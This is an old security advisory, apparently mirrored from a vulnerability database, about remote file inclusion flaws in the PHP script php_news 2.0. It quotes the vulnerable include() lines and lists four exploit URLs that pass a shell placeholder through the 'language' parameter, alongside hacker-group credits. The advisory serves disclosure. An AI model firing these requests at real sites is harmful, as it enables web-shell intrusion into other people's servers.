php_news => 2.0 Remote File Include Vulnerabilities

2006-09-27T00:00:00
ID SECURITYVULNS:DOC:14446
Type securityvulns
Reporter Securityvulns
Modified 2006-09-27T00:00:00

Description

php_news => 2.0 Remote File Include Vulnerabilities

Script.............. :php_news

Discovered By.... : Root3r_H3ll

Location .......... : Iran

Class.............. : Remote

Original Advisory : http://Www.PersainFox.com

We ArE : Root3r_H3LL & Arash.Rj

<Spical TNX Irania Hackers :

( Aria-Security , Crouz , DeltaHacking , Iranhackers Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev )

</\/\\/_ 10\/3 15 1|)\4/\/

      |&#41;&#92;0073|&#41;&#92;_|-|311

CodEs :

include_once("admin/language/".$language."_news.php") include("language/".$language."_catagory.php") include_once("language/".$language."_news.php"); include("language/".$language."_users.php")

ExPloits :

Www.Site.coM/[path]/admin/user_user.php?language=Sh3ll Www.Site.coM/[path]/admin/news.php?language=Sh3ll Www.Site.coM/[path]/admin/catagory.php?language=Sh3ll Www.Site.coM/[path]/creat_news_all.php?language=Sh3ll